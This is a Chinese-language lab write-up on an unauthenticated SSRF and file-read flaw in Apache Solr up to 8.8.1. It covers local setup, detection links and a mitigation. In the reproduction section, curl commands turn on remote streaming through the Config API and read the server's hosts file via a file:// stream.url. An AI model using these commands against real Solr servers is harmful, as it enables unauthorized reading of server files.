目录

漏洞简述

环境搭建

漏洞复现

漏洞检测

漏洞修复

---

漏洞简述

Apache Solr是一个开源的搜索服务，使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器，是Apache Lucene项目的开源企业搜索平台。

该漏洞是由于没有对输入的内容进行校验，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行SSRF攻击，最终造成任意读取服务器上的文件。

影响版本

• Apache Solr <=8.8.1 (latest) ，通杀所有版本，官方拒绝修复

环境搭建

下载链接：链接: https://pan.baidu.com/s/1h4MM2XAOWspfTh4QOwGjhw?pwd=6dtf 提取码: 6dtf

解压到小蓝皮（phpstudy_pro）的根目录

在 bin 目录的地址栏输入 cmd 打开终端，开启一个端口

solr start -p 3333

在浏览器搜索

127.0.0.1:3333

如果127.0.0.1不行的话就使用 ipconfig 命令查看本机IP，用本机 IP 去访问

此时 Solr 已经在 server/solr 目录下已经创建了名字为 new_core 的文件夹

把 solr-8.8.1\server\solr\configsets\_default 下的 conf 的文件夹复制到 solr-8.8.1\server\solr\new_core 目录里

然后再返回页面点击 Add Core

漏洞复现

通过访问以下地址可以看到当前的 Core 名称

http://127.0.0.1:3333/solr/admin/cores?indexInfo=false&wt=json

结合上一步获取到的 Core 名称访问以下地址可查看详细信息

http://127.0.0.1:3333/solr/new_core/config

使用 curl 对 Config API 打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关

curl -d "{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}" http://192.168.110.24:3333/solr/new_core/config -H "Content-type:application/json"

使用 curl 对 stream.url 参数利用 file 伪协议读取本机的 hosts 的文件

curl "http://192.168.110.24:3333/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"

漏洞检测

GitHub - Henry4E36/Solr-SSRF: Apache Solr SSRF(CVE-2021-27905)

GitHub - W2Ning/Solr-SSRF: CVE-2021-27905

漏洞修复

• 将 Solr 端口仅对内网开放，并配置访问策略
• 无修复版本